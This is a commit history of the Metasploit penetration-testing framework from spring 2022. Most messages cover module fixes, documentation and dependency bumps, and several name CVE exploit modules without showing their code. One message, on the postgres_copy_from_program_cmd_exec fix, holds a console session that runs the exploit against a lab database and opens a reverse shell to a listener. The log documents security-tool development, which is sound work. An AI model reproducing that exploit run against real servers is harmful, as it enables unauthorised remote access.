Heyder Andrade d2e122c7f8 Rubocop 2022-04-18 17:57:01 +02:00
Heyder Andrade 44b34b772a Making SSH defaults widely used 2022-04-18 17:53:42 +02:00
Heyder Andrade be6a56feff Rubocop 2022-04-18 17:49:04 +02:00
Heyder Andrade c7ce4d2592 Making SSH defaults widely used 2022-04-18 17:38:41 +02:00
space-r7 54f8d44639 add osx binary 2022-04-18 09:42:40 -05:00
npm-cesium137-io 37af434510 Add vcenter_secrets_dump post module 2022-04-17 19:25:32 -04:00
h00die e927da2ffa land #16359, docs for ipidseq aux module 2022-04-17 08:35:20 -04:00
h00die 079794c2de doc cleanup for ipidseq 2022-04-17 08:34:53 -04:00
Metasploit 6a9e73e689 automatic module_metadata_base.json update 2022-04-16 18:30:05 -05:00
Jeffrey Martin 7c8c0b5e05 Land #16446, Bump RubySMB 2022-04-16 18:10:19 -05:00
Metasploit 4e17ccede4 automatic module_metadata_base.json update 2022-04-16 15:45:52 -05:00
Grant Willcox 3f9e4e2d82 Land #16461, Move getsimplecms_unauth_code_exec.md documentation to http dir 2022-04-16 15:15:22 -05:00
Grant Willcox 8e4708205d Land #16458, fortios_vpnssl_traversal_creds_leak: Add authors, notes, and references 2022-04-16 15:08:32 -05:00
Brendan Coles 66fe338297 Move getsimplecms_unauth_code_exec.md documentation to http dir 2022-04-16 16:53:34 +00:00
RageLtMan ce76f0e62e Upcase error check for consistency 2022-04-16 07:27:36 -04:00
Brendan Coles e34201ce48 fortios_vpnssl_traversal_creds_leak: Add authors, notes, and references 2022-04-16 06:52:59 +00:00
Grant Willcox a977d48508 Land #16448, Add in dependency updates PR action 2022-04-15 17:08:03 -05:00
Jeffrey Martin 74e734c7e8 restore multi-char short flag support
Recent updates in `Rex::Parser::Arguments` regressed the ability have
short flags with multiple characters.
2022-04-15 15:11:11 -05:00
Metasploit d22065f09a automatic module_metadata_base.json update 2022-04-14 13:53:48 -05:00
Jack Heysel 0d3f50522d Land #16318 Add support to old KEX algorithms
This commit fix the issue #16138 by adding
support to old key exchange algorithms in
the net/ssh lib by defining the
append_all_supported_algorithms to true.
2022-04-14 11:29:39 -07:00
Grant Willcox b83a4b2a7a Add in fixes to module and documentation from final review 2022-04-14 12:45:15 -05:00
Metasploit 67e710b69b Bump version of framework to 6.1.39 2022-04-14 12:31:53 -05:00
Jeffrey Martin 60e3e6e532 Land #16455, Remove railgun requirement from post file mixin 2022-04-14 12:04:47 -05:00
bwatters 83f4473c2a Correct Ubuntu target version 2022-04-14 12:01:38 -05:00
Metasploit ae9f12ab97 automatic module_metadata_base.json update 2022-04-14 11:59:59 -05:00
Grant Willcox 82be63ffdc Land #16451, Use debug versions of extensions if MeterpreterDebugBuild is enabled 2022-04-14 11:34:08 -05:00
adfoster-r7 7f24482ade Remove railgun requirement from post file mixin 2022-04-14 17:14:18 +01:00
adfoster-r7 22a3ae1bf5 Land #16411, expose detailed results for each module match 2022-04-14 17:06:57 +01:00
bwatters 03d01d2f72 Remove stray markup 2022-04-14 10:29:54 -05:00
Heyder Andrade bf849eb2a2 Making SSH defaults widely used 2022-04-14 17:27:19 +02:00
bwatters f32443b477 Update with debug source code and options, cleanup module code per gwillcox-r7 2022-04-14 10:25:55 -05:00
Heyder Andrade c4700c9e64 Rubocop 2022-04-14 17:25:48 +02:00
Jeffrey Martin 4bf199aff5 remove duplicate condition 2022-04-14 10:18:59 -05:00
Heyder Andrade 64eccf5578 Rollback changes used for test 2022-04-14 14:48:26 +02:00
Redouane NIBOUCHA 8e9e2aa7e8 Use OptEnum instead of OptInt for DBMS and SQLI_TYPE 2022-04-14 03:56:12 +02:00
Jack Heysel 04f042ae47 Land #16221, a wordpress_scanner bug fix
Adjust wordpress_url_rest_api definition to support
sites that don't place REST API under /index.php/
2022-04-13 14:22:17 -07:00
jerrelgordon 92a1e207db Update modules/post/windows/gather/get_bookmarks.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2022-04-13 14:50:07 -04:00
Heyder Andrade d3c8119e25 Removed string from the command input 2022-04-13 18:55:17 +02:00
Heyder Andrade 29aae09b62 Added support to depecreted key exchange algorithms 2022-04-13 18:54:12 +02:00
Heyder Andrade 0eb9d68319 Added support to depecreted key exchange algorithms 2022-04-13 18:53:50 +02:00
Heyder Andrade 1305baf6f6 Module should use ssh_defaults 2022-04-13 18:51:43 +02:00
ORelio fa86decd09 Apply suggestion from code review
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2022-04-13 18:25:45 +02:00
Metasploit e127f3013d automatic module_metadata_base.json update 2022-04-13 11:09:40 -05:00
adfoster-r7 26e8ade3f7 Land #16396, add configuration for debug logging in PHP Meterpreter 2022-04-13 16:49:24 +01:00
dwelch-r7 be7510dba3 Additional mocking 2022-04-13 15:46:18 +01:00
dwelch-r7 aca1b8df9b Use debug versions of extensions if MeterpreterDebugBuild is enabled 2022-04-13 14:10:57 +01:00
ORelio 1ddd893b0f VNC Keyboard Exec: Avoid typing too fast
Avoid overloading target's keyboard buffer by inserting small sleeps in long commands
2022-04-13 14:28:17 +02:00
sjanusz b5dd215cee Update cached PHP Meterpreter payload size 2022-04-13 13:09:00 +01:00
bwatters 42a56b2800 Remove the thing I commented out..... 2022-04-12 21:19:20 -05:00
bwatters 147d6e1df7 Added docs, reverted strip_comments, rubocop'd 2022-04-12 21:14:11 -05:00
Jeffrey Martin 3fe5e8b450 dependency updates PR action
In an effort to offer an opportunity for security review and approval
of gem updates after a version is tagged and pushed a new `bundle update`
be preformed and a branch pushed containing the isolate `Gemfile.lock` changes.

This new action will open a PR for committers to review and an land after
completing security review of updates in the gems.
2022-04-12 14:40:15 -05:00
sjanusz 630efa6dbe Bump payloads version 2022-04-12 18:13:29 +01:00
sjanusz 5fdf82ff76 Add toggleable logging to console & file to PHP Meterpreter 2022-04-12 17:15:06 +01:00
Spencer McIntyre 052e56174d Bump the version of RubySMB to 3.1 2022-04-12 10:46:55 -04:00
Spencer McIntyre a4a9bc033a Fix building the SessionSetup request for MS17-010
RubySMB commit 8035d9c2 broke the exploit's SessionSetup request.
2022-04-12 10:45:17 -04:00
Grant Willcox c6f97d8f2c Freenode is kinda old now and the channel is fairly dead now. Suggest Slack instead for nick contact but keep Freenode in just in case people prefer that. 2022-04-12 09:27:36 -05:00
Grant Willcox 5358bb66fc Updated How to Apply to GSoC (markdown) 2022-04-12 09:26:25 -05:00
Metasploit cb9e412138 automatic module_metadata_base.json update 2022-04-12 06:58:49 -05:00
dwelch-r7 592690f22f Land #16377, Add debug option to Python Meterpreter 2022-04-12 12:41:05 +01:00
sjanusz b0e4a16fa1 Update cached Python Meterpreter payload sizes 2022-04-12 11:39:56 +01:00
sjanusz 020e65c958 Bump payloads version 2022-04-12 11:28:09 +01:00
sjanusz fc73498919 Add debug option to Python Meterpreter 2022-04-12 10:54:26 +01:00
usiegl00 b9052be102 Use libdyld locator to fix osx stager on monterey
We locate the dyld_shared_cache in memory to find and resolve the
functions we need in libdyld.dylib. We retain the original dyld location
method on osx versions before Sierra.

Explicitly set length for osx x64 initial stage

The rdx register, used for passing the payload length, is being
clobbered by a system call in the new MacOS version. Instead of relying
on the register being untouched, we set it equal to the payload length.
2022-04-12 11:27:23 +09:00
Metasploit c786d9c150 automatic module_metadata_base.json update 2022-04-11 15:28:05 -05:00
h00die ab382cddf0 change requireauth to authprompt 2022-04-11 14:26:25 -04:00
Simon Janusz 45dcfda49a Land #16418, Add debugging Meterpreter sessions navigation entry
Add debugging Meterpreter sessions navigation entry
2022-04-11 11:34:00 +01:00
Redouane NIBOUCHA 8369286956 Remove obsolete PostgreSQL test module, and push one for all the supported DBMS
Remove the postgres_sqli_test
2022-04-11 03:26:39 +02:00
h00die f7b58e243c smtp server can prompt for auth 2022-04-10 11:55:07 -04:00
h00die 38e5e4350b add esxi to ssh_login platforms 2022-04-10 11:24:42 -04:00
RageLtMan d06a5db6d6 Enumerate Windows AV via WMI root\SecurityCenter2
Query WMI via shell or meterpreter session for deployed AV products
from the root\SecurityCenter2 namespace; record results as notes.
2022-04-09 12:06:41 -04:00
adfoster-r7 f4a8baf9e2 Add pivoting section 2022-04-08 22:45:51 +01:00
Grant Willcox e31c60c47d Updated Pivoting in Metasploit (markdown) 2022-04-08 15:41:14 -05:00
adfoster-r7 a53be3184a Improving error handling of Kerberos 2022-04-08 20:48:10 +01:00
Grant Willcox acb155f57f Redo documentation per review edits n suggestions and add in pivoting via SOCKS module with proxychains-ng 2022-04-08 14:23:57 -05:00
adfoster-r7 1e867ac5a7 Improve kerberos user enum module 2022-04-08 15:55:37 +01:00
vleminator 525480d592 Change the doc to reflect changes to the module. Additionally, the different target options are showcased 2022-04-08 11:11:27 +02:00
vleminator 2fdcc143c0 Improve usability by turning the payload path into custimizablea module option 2022-04-08 11:10:16 +02:00
vleminator cf5bca9166 Improve exploit reliability 2022-04-08 10:47:23 +02:00
vleminator 6c96fd9ab9 Apply rubocop suggestions 2022-04-08 09:48:41 +02:00
Grant Willcox 1e3d60a110 Updated Pivoting in Metasploit (markdown) 2022-04-07 18:45:34 -05:00
Grant Willcox 58e668fecf Create Initial Copy of Pivoting Page 2022-04-07 18:45:12 -05:00
bwatters 4fada9570c Remove extra file 2022-04-07 17:12:37 -05:00
bwatters 96d86944da Added precompiled binary and option to strip output, fixed comment-strip bug 2022-04-07 17:09:35 -05:00
adfoster-r7 d81173fa81 Fix encoding 2022-04-07 19:13:59 +01:00
Metasploit c252faf938 Bump version of framework to 6.1.38 2022-04-07 12:06:06 -05:00
Spencer McIntyre 5de966cfb1 Land #16382, CVE-2022-26904 SuperProfile LPE 2022-04-07 12:52:39 -04:00
Jeffrey Martin 8356b3cc1c refactor analyze rpc interface & output format 2022-04-07 11:06:42 -05:00
Grant Willcox 51e37bbe42 Add in process kill off code for Meterpreter sessions, seems I forgot to include this 2022-04-07 10:48:08 -05:00
dwelch-r7 a82c936613 Land #16373, Add initial ruby 3.1 support 2022-04-07 16:44:02 +01:00
Grant Willcox 80d31636f8 Land #16398, add missing payload tests 2022-04-07 10:40:47 -05:00
vleminator 7b2e8cf37f Apply suggestions from code review
Co-authored-by: bcoles <bcoles@gmail.com>
2022-04-07 16:57:00 +02:00
vleminator 3bba17bc56 fail_with should not be used in check 2022-04-07 16:53:17 +02:00
vleminator b60dd43405 Add modules notes, with Spring4Shell 2022-04-07 16:46:49 +02:00
vleminator 53adf24c86 Apply suggestions from code review
Co-authored-by: bcoles <bcoles@gmail.com>
2022-04-07 16:40:03 +02:00
jerrelgordon 32edc6c5b5 variable name changes 2022-04-07 10:23:54 -04:00
vleminator fe59475c9f Change the documentation to resemble the correct exploit filename 2022-04-07 15:43:07 +02:00
vleminator 4e6176d9ca Finish exploit CVE-2022-22965 2022-04-07 15:22:18 +02:00
Grant Willcox 619661a845 Land #16419, Fix crash when sorting modules by disclosure date 2022-04-06 16:50:08 -05:00
Jeffrey Martin 34bcf48724 Updated How to Apply to GSoC (markdown) 2022-04-06 16:20:47 -05:00
Grant Willcox 1d24ed34a9 Note some important changes for 2022 2022-04-06 16:16:54 -05:00
bwatters db89fc5e7a Add module for cve-2022-0995 2022-04-06 13:35:14 -05:00
adfoster-r7 aafb38c7ed Fix crash when sorting modules by disclosure date 2022-04-06 18:51:28 +01:00
Metasploit ba3f455132 automatic module_metadata_base.json update 2022-04-06 11:36:40 -05:00
space-r7 1fd779c52c Land #15972, add LEAK_PARAMS option log4shell scan 2022-04-06 11:17:44 -05:00
Grant Willcox 4638067723 Fix RuboCop errors 2022-04-06 09:18:05 -05:00
Grant Willcox f93d4a6f67 Add more detail to Data Visualization project to help users understand what is going on a bit more 2022-04-06 09:14:34 -05:00
Grant Willcox c64a191a77 Add in link to Metasploit Goliath Wiki Page 2022-04-06 09:07:05 -05:00
adfoster-r7 e10c0fb1a5 Extract navigation config to a separate file 2022-04-06 14:16:36 +01:00
Spencer McIntyre 70b1da6df4 Fix a misspelling 2022-04-06 09:04:26 -04:00
Spencer McIntyre 04ac668e21 Update the docs for readability 2022-04-06 08:58:09 -04:00
adfoster-r7 b611b601b4 Improve SEO 2022-04-06 13:27:10 +01:00
adfoster-r7 f30fc33785 Rename file for consistency 2022-04-06 13:21:59 +01:00
adfoster-r7 d70bd696ba Rename file for consistency 2022-04-06 13:15:26 +01:00
Metasploit a63ad7743a automatic module_metadata_base.json update 2022-04-06 05:05:31 -05:00
Christophe De La Fuente 94e0eec249 Land #16082, Add ShadowMitmDispatcher to the smb_shadow module 2022-04-06 11:45:59 +02:00
Metasploit 025802474e automatic module_metadata_base.json update 2022-04-06 02:18:08 -05:00
Tim W d60754ea37 Land #16401, add CVE-2022-22616 to osx_gatekeeper_bypass 2022-04-06 07:57:32 +01:00
jerrelgordon 9b03e74484 Documentation for get_bookmarks module 2022-04-05 22:49:12 -04:00
Grant Willcox c8c91fcaf3 Add in fix to ensure that we can spawn sessions automatically on Windows 10 20H2 and other systems were we hit a bug with UAC prompts from the exploit DLL itself not triggering the payload 2022-04-05 19:16:48 -05:00
usiegl00 27c8210b27 Update smb_shadow module to fix rubocop errors
Use msftidy to fix the rubocop errors.
2022-04-06 07:12:46 +09:00
usiegl00 8495bff61c Merge master and update the smb_shadow module
Add comments detailing the technique used to attack SMBv3. Remove some
comments that are no longer needed. Fix Gemfile.lock conflict.
2022-04-06 07:06:45 +09:00
Spencer McIntyre 05f6de65df Update the docs to include LEAK_PARAMS 2022-04-05 17:52:11 -04:00
Grant Willcox 597e173b0a Update license terms to properly comply with MIT license on exploit code. 2022-04-05 16:31:03 -05:00
jerrelgordon aa7cba7b72 included store_loot and string interpolation 2022-04-05 16:50:51 -04:00
RageLtMan 23fc179160 Scan for log4shell-provided infoleaks
The formatted string containing the JNDI URL can contain further
formatted strings within it sourcing data from the formatting Java
context. This is the mechanism by which this module already gathers
target information.

Expand this capability by permitting the user to supply their own
query string variables separated by '^' and comparing the output
to these inputs for extraction of relevant exposed values.

To help with targeting for the pending-in-PR exploit module, add OS
detection capabilities as well.
2022-04-05 16:38:26 -04:00
Metasploit 1009e7c725 automatic module_metadata_base.json update 2022-04-05 15:17:04 -05:00
jerrelgordon d96c3df3e7 Ran rubocop and added notes 2022-04-05 16:09:37 -04:00
space-r7 1a48bccb42 Land #16403, improve Qemu / KVM detection 2022-04-05 14:58:16 -05:00
Jeffrey Martin d35137ed3a initial Msf::Analyze::Result top level states 2022-04-05 14:06:40 -05:00
Grant Willcox 9e2d7f655b Update data to fix more things found during review process 2022-04-05 12:48:11 -05:00
adfoster-r7 b2da562d97 Add initial boilerplate documentation 2022-04-05 17:59:07 +01:00
jerrelgordon d3e32eca5b Style fixes 2022-04-05 12:59:01 -04:00
space-r7 a43bfc9292 use safari version with specific cve 2022-04-05 10:31:51 -05:00
space-r7 4c8c32b3ff set file header to Contents dir, check safari vers 2022-04-05 10:16:59 -05:00
usiegl00 09ae52fecd Update smb_shadow and shadow_mitm_dispatcher
Remove duplicated print_status messages. Use respond_to? instead of
methods.include?. Simplify payload generation. Fix naming for the rst
capture thread.
2022-04-05 20:03:14 +09:00
Grant Willcox db4b22df5e Update the exploit code to output errors in a better format, and fix a potential issue when trying to delete folders recursively. Also update exploit module to try kill msiexec.exe if its still running to prevent it holding onto handles when it shouldn't be. 2022-04-04 17:58:52 -05:00
adfoster-r7 3e63fe579f Land #16410, Fix setg sessiontlvlogging crashing on non-Meterpreter sessions 2022-04-04 22:43:34 +01:00
Metasploit c80994a6a1 automatic module_metadata_base.json update 2022-04-04 14:32:45 -05:00
Grant Willcox 4a27909358 Land #16399, Add in CVE-2022-28381 - AllMediaServer 1.6 SEH Buffer Overflow 2022-04-04 14:12:03 -05:00
Jeffrey Martin fd809d49ea expose detailed results for each module match 2022-04-04 13:10:48 -05:00
sjanusz 3b313b4ebe Fix setg sessiontlvlogging crashing on non-Meterpreter sessions 2022-04-04 18:31:50 +01:00
Grant Willcox e800dcb597 Add in documentation file 2022-04-04 12:05:28 -05:00
Grant Willcox bba40bcd21 Add in fixes from code review 2022-04-04 12:05:21 -05:00
Grant Willcox 7e5123cd24 Add initial code from Hajap Zairy Al-Sharif 2022-04-04 11:56:14 -05:00
adfoster-r7 a510d74cf9 Land #16408, fix postgres_copy_from_program_cmd_exec to quote table name 2022-04-04 13:31:54 +01:00
Alexander Neumann 642bb12505 postgres_copy_from_program_cmd_exec: Quote table name
In about 16% of all cases the random value of "tablename" will be set to
a value starting with a number, which needs to be quoted before the
query is sent to the postgres server. Otherwise the query fails with the
message "Exploit failed". This is what happened to me, you can see an
example with a table name set manually here:

    msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec
    [*] Using configured payload cmd/unix/reverse_perl
    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set RHOSTS 192.168.2.2
    RHOSTS => 192.168.2.2
    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set tablename 123test
    tablename => 123test
    [...]
    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

    [*] Started reverse TCP handler on 192.168.2.1:4444·
    [*] 192.168.2.2:5432 - 192.168.2.2:5432 - PostgreSQL [...]
    [*] 192.168.2.2:5432 - Exploiting...
    [!] 192.168.2.2:5432 - 192.168.2.2:5432 - Unable to execute query: DROP TABLE IF EXISTS 123test;
    [-] 192.168.2.2:5432 - Exploit Failed

This can be verified manually as follows, quoting the table name works:

    $ psql --user postgres -W -h 192.168.2.2 template1
    [...]
    template1=# DROP TABLE IF EXISTS 123test;
    ERROR:  syntax error at or near "123"
    LINE 1: DROP TABLE IF EXISTS 123test;
                                 ^
    template1=# DROP TABLE IF EXISTS "123test";
    NOTICE:  table "123test" does not exist, skipping
    DROP TABLE

With the patch, the script also works with table names which start with
numbers:

    msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

    [*] Started reverse TCP handler on 192.168.2.1:4444
    [*] 192.168.2.2:5432 - 192.168.2.2:5432 - PostgreSQL [...]
    [*] 192.168.2.2:5432 - Exploiting...
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test dropped successfully
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test created successfully
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test copied successfully(valid syntax/command)
    [+] 192.168.2.2:5432 - 192.168.2.2:5432 - 123test dropped successfully(Cleaned)
    [*] 192.168.2.2:5432 - Exploit Succeeded

    [*] Command shell session 1 opened (192.168.2.1:4444 -> 192.168.2.2:51734 ) at 2022-03-24 10:15:33 +0100
2022-04-04 10:32:01 +02:00
jerrelgordon 476ff36d8d Bug fixes
*fixed typo for "browser"
*modified to use read_file instead of file.open to read files
2022-04-03 11:52:20 -04:00
jerrelgordon 587096f15d Create get_bookmarks.rb
Metasploit Module that retrieves bookmarks from the following browsers: Google Chrome, Opera & Microsoft Edge.
2022-04-03 03:57:17 -04:00
RageLtMan 35bd113952 Improve Qemu/KVM detection for BOCHS HW
Does what it says:
```
[*] Checking if the target is a Virtual Machine ...
[+] This is a Qemu/KVM Virtual Machine
[*] Post module execution completed

```
2022-04-02 10:43:57 -04:00
usiegl00 7e010cbde2 Merge master and update smb_shadow + dispatcher
The smb_shadow module can confirm the server smb version supported with
the ConfirmServerDialect option. The shadow_mitm_dispatcher closes each
stream before opening a new one to prevent leaking file descriptors.
2022-04-02 10:39:02 +09:00
space-r7 0505dff7e3 add option in verification steps 2022-04-01 18:03:49 -05:00
space-r7 e9e1e26def add support for CVE-2022-22616, update docs 2022-04-01 17:50:33 -05:00
Grant Willcox 8daecca5c3 Update code with latest changes 2022-04-01 12:11:05 -05:00
Jeffrey Martin cb5d449676 add missing payload tests
A number of recent payload adds do not conform the patterns
used for suggesting spec configurations.  Manually added these
tests to remove warning in rspec run.
2022-04-01 12:01:17 -05:00
Metasploit e12d421a32 automatic module_metadata_base.json update 2022-04-01 11:35:25 -05:00
space-r7 fc1809370d Land #16381, add chocolatey enumerator module 2022-04-01 11:16:28 -05:00
space-r7 79df6190e6 call chocopath once, return nil instead of false 2022-04-01 10:56:11 -05:00
RadioLogic eb54081a62 Made table regex properly only grab lines that are start lines 2022-04-01 11:31:23 -04:00
adfoster-r7 bef0c9be8f Land #16299, Make TLV Logging cache threadsafe 2022-04-01 16:19:45 +01:00
Metasploit aca82f5a89 automatic module_metadata_base.json update 2022-04-01 09:59:41 -05:00
adfoster-r7 35771327ce Land #16320, Add debug option for windows meterpreter 2022-04-01 15:41:57 +01:00
dwelch-r7 7d099ab428 Bump payloads version 2022-04-01 14:03:19 +01:00
dwelch-r7 37117383f7 Updated cached sizes 2022-04-01 11:58:53 +01:00
dwelch-r7 2f76a650c1 Updated cached sizes 2022-04-01 11:33:30 +01:00
dwelch-r7 647463b5ad Use updated payloads gem and refactor debug option 2022-04-01 11:20:22 +01:00
dwelch-r7 8e773c1939 Rename debug option and make it advanced 2022-04-01 11:14:52 +01:00
dwelch-r7 13ca7c88f3 Add debug option for windows meterpreter 2022-04-01 11:14:52 +01:00
Grant Willcox d29f5690a1 Add in backup code to DLL template to fall back to old way of executing things in case the BREAKAWAY_FROM_JOB flag cannot be used 2022-03-31 14:28:29 -05:00
Grant Willcox 57473850c1 Fix up RuboCop errors as last change made it so that we had an unless elsif statement which isn't valid in Ruby 2022-03-31 12:52:16 -05:00
Grant Willcox 24342e764c Update solution file so that we can only build the DLL for x64 bit platforms since that is the only one we support at this time 2022-03-31 12:31:55 -05:00
Grant Willcox 743138abed Add in initial fixes from review and remove extra BREAKAWAY_FROM_JOB code changes not directly related to this PR as we'll raise a separate PR for those 2022-03-31 12:13:29 -05:00
Metasploit 39aa17fd61 Bump version of framework to 6.1.37 2022-03-31 12:06:46 -05:00
Metasploit 5bac9c5119 automatic module_metadata_base.json update 2022-03-31 11:00:06 -05:00
space-r7 1f6c4d634e Land #16395, add Spring Cloud Function SpEl RCE 2022-03-31 10:41:30 -05:00
RadioLogic 6f933291be Made chocopath give false if all other alternatives dont work 2022-03-31 11:32:43 -04:00
RadioLogic c6c77b9c7e Merge branch 'enum_chocolatey_applications' of github.com:rad10/metasploit-framework into enum_chocolatey_applications 2022-03-31 11:27:06 -04:00
RadioLogic 2ed4a4a6e9 Used fail statements where exit should fail 2022-03-31 11:27:02 -04:00
RadioLogic 8177b101e5 Made chocopath correctly get choco based on where results 2022-03-31 11:26:39 -04:00
RadioLogic f9156acb49 Make chocolatey? act like correct bool function 2022-03-31 11:25:33 -04:00
RadioLogic 6c92509877 Apply suggestions from code review
Changed at symbol in author

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-03-31 11:01:00 -04:00
RadioLogic d361ce961e Update modules/post/windows/gather/enum_chocolatey_applications.rb
Added spelling corrections to descriptions

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2022-03-31 10:56:19 -04:00
Florian Griesser 8fd0b11a8b Requested changes pull request in documentation ipidseq.md 2022-03-31 15:58:07 +02:00
Spencer McIntyre 211626e7ce Fix the check method, add docs 2022-03-31 09:01:08 -04:00
adfoster-r7 4c1883ef07 Updated Setting Up a Metasploit Development Environment (markdown) 2022-03-31 00:09:53 +01:00
adfoster-r7 0c63ddd724 Updated Setting Up a Metasploit Development Environment (markdown) 2022-03-31 00:08:10 +01:00
Spencer McIntyre 94cf23e4cf Finish the Spring Cloud Function exploit 2022-03-30 18:38:41 -04:00
adfoster-r7 ef1e1e7faf Updated Setting Up a Metasploit Development Environment (markdown) 2022-03-30 23:20:08 +01:00
Metasploit 276d85ee77 automatic module_metadata_base.json update 2022-03-29 10:04:03 -05:00
space-r7 cc6eb75cd7 Land #16364, use dnsruby api for native_spoofer 2022-03-29 09:44:31 -05:00
RadioLogic e8d18a65dd Updated module documentation using msftidy 2022-03-29 08:36:36 -04:00
Grant Willcox 51df37de87 Add in documentation and also update the module to handle NarratorQuickstart.exe which sometimes comes up and can lead to visual indicators 2022-03-28 17:53:53 -05:00
Grant Willcox 5695863901 Add in updated source code for exploiting domain joined systems 2022-03-28 16:17:58 -05:00
Grant Willcox bd3e0c1b53 Add in support for exploiting domain joined systems 2022-03-28 16:14:19 -05:00
RadioLogic ddf96d44e7 Added unique data to notes 2022-03-28 13:45:34 -04:00
RadioLogic dcec540c5d Cleaned with rubocop 2022-03-28 13:44:45 -04:00
RadioLogic 447a3d47ea Replaced loot with notes 2022-03-28 13:39:23 -04:00
RadioLogic ec3a5b9db6 Made module not executable 2022-03-28 13:23:28 -04:00
Brendan Coles 283dda8172 Land #16386, Exploit::Remote::SocketServer: Wait if service is running 2022-03-28 03:41:06 +00:00
RadioLogic d3d9acf1e4 Added documentation for module in docs folder 2022-03-27 16:02:34 -04:00
RadioLogic 6ef3cf7ed0 Added better separation between chocolatey 1.0 and newer chocolatey versions 2022-03-27 15:04:06 -04:00
RadioLogic 8607fd766f Added side effects back in since descriptions want them 2022-03-27 15:03:37 -04:00
RadioLogic 86266ad5bd Updated info values to allow info to work 2022-03-27 14:42:44 -04:00
RadioLogic d65a2fd687 Removed use of powershell since its unnecessary 2022-03-27 14:16:04 -04:00
RadioLogic 9cc6944c18 Added option to change chocolatey path location in case its not on path 2022-03-27 14:14:02 -04:00
adfoster-r7 c4b6eb0165 Fix java rmi service undefined method wait 2022-03-27 17:01:43 +01:00
RadioLogic 0489655c72 Added notes on stability 2022-03-26 13:32:11 -04:00
RadioLogic 2ae6d1f655 Renamed havechocolatey 2022-03-26 13:31:58 -04:00
RadioLogic 8248c1d0b8 Formatted document with rubocop 2022-03-26 13:26:22 -04:00
Grant Willcox b408197cb7 Another round of RuboCop 2022-03-25 17:37:05 -05:00
Grant Willcox 393765a2f0 Add in UAC checks to ensure PromptOnSecureDesktop is set appropriately before attempting to exploit. Also clean up some of the extra code to prevent unneeded cmd level commands from running 2022-03-25 17:26:48 -05:00
Grant Willcox 56e21ae3a2 Update check code to now use cmd_exe as other call was hanging forever, and also update the check code to use Meterpreter functions if available vs always running shell commands. 2022-03-25 15:25:48 -05:00
Grant Willcox f7c271aaf4 Add in fixes from Spencer's quick initial review of module to address typos and proper check code return values 2022-03-25 14:14:56 -05:00
Grant Willcox bab215fccb Remove .vs directory and associated files as there is no need for us to ship those files 2022-03-25 14:11:17 -05:00
Grant Willcox 5ad16a1864 Undo changes to changing process in prepend_migrate, my idea was only to add in CREATE_BREAKAWAY_FROM_JOB flags 2022-03-25 12:48:23 -05:00
Grant Willcox e82c25841c RuboCop module to pass tests 2022-03-25 12:45:00 -05:00
Grant Willcox 561c5d513e Update module's on_new_session code 2022-03-25 12:16:44 -05:00
RadioLogic 840d26aa2d Added module to enumerate through chocolatey applications 2022-03-25 13:13:15 -04:00
Heyder Andrade 79783bbe9b Checking if datastore is defined 2022-03-25 16:32:58 +01:00
Metasploit a59aa864c3 Bump version of framework to 6.1.36 2022-03-24 18:44:06 -05:00
adfoster-r7 76ede9ef8f Add ruby 3.1 support 2022-03-24 21:59:02 +00:00
Heyder Andrade ee8618e68a Handling undefined local variable
Auxiliary failed: NameError undefined local variable or method `datastore'
for #<Metasploit::Framework::LoginScanner::SSH
2022-03-24 22:57:27 +01:00
Heyder Andrade 6bc0032c8d Use SSH defaults
- Merge ssh defaults
- Remove options equals to default
2022-03-24 22:52:15 +01:00
Grant Willcox 8e73710843 Add in on_new_session method to do automatic cleanup with supported session types. Think this is only Meterpreter at the moment 2022-03-24 14:36:29 -05:00
Spencer McIntyre cec44f0cab Land #16371, Fix websocket crash 2022-03-24 13:07:34 -04:00
Grant Willcox 3d871e0ea9 Remove unneeded DLL from source code 2022-03-24 11:59:20 -05:00
Grant Willcox b504585979 Add in source code 2022-03-24 11:56:18 -05:00
Metasploit f4dd3297b0 automatic module_metadata_base.json update 2022-03-24 10:27:52 -05:00
Grant Willcox bf88b7f618 Land #16325 - Replace IO read on binary files with File binread 2022-03-24 10:08:40 -05:00
Grant Willcox e5c0259723 Add CREATE_BREAKAWAY_FROM_JOB flag to source files related to DLL generation, update the exploit source to denote how to clean up in case the payload can't clean up 2022-03-23 19:38:32 -05:00
Grant Willcox a25b3a70ad Update permissions on template DLLs 2022-03-23 17:49:03 -05:00
Grant Willcox b1ce05f97c Add in updated Ruby code and also update the DLLs and prepend_migrate.rb to use the CREATE_BREAKAWAY_FROM_JOB flag with CreateProcess to break away from the job if the job has the JOB_OBJECT_LIMIT_BREAKAWAY_OK limit set to allow breakaway jobs 2022-03-23 17:47:25 -05:00
Grant Willcox ff77ff0d11 Fix RuboCop issues with ubiquiti_config.rb 2022-03-23 11:32:45 -05:00
sjanusz 558d8bb727 Make TLV Logging cache threadsafe 2022-03-23 10:35:39 +00:00
Metasploit 030c040372 automatic module_metadata_base.json update 2022-03-23 02:40:13 -05:00
Tim W 014c98acd8 Land #16369, fix upgrading meterpreter sessions with shell_to_meterpreter 2022-03-23 07:15:55 +00:00
alanfoster cebdebb188 Fix kubernetes websocket crash when identifying peer host 2022-03-23 02:28:47 +00:00
Metasploit 53e470b1b9 automatic module_metadata_base.json update 2022-03-22 19:31:49 -05:00
adfoster-r7 03d645016c Land #16250, Update service mixins for NAT options 2022-03-23 00:13:20 +00:00
Metasploit 1c4dc9a218 automatic module_metadata_base.json update 2022-03-22 17:18:25 -05:00
Grant Willcox 964f78fc69 Land #16341, Implement VNC hash types 2022-03-22 17:00:02 -05:00
Grant Willcox 1408ffbab7 Fix up typo and wording on some comments 2022-03-22 16:29:08 -05:00
Metasploit 81e4abcd8d automatic module_metadata_base.json update 2022-03-22 14:22:54 -05:00
Grant Willcox 5bbde5bb81 Land #16367, Fix character escaping in the apisix exploit 2022-03-22 14:04:07 -05:00
Metasploit f6c24a0265 automatic module_metadata_base.json update 2022-03-22 14:00:25 -05:00
